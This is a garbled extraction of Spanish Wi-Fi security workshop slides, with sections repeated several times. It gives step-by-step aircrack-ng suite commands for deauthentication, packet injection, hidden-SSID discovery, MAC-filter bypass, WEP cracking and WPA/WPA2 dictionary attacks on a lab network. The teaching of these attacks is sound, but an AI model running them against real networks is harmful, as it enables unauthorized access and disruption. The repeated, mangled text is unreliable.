httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 31: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 32: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

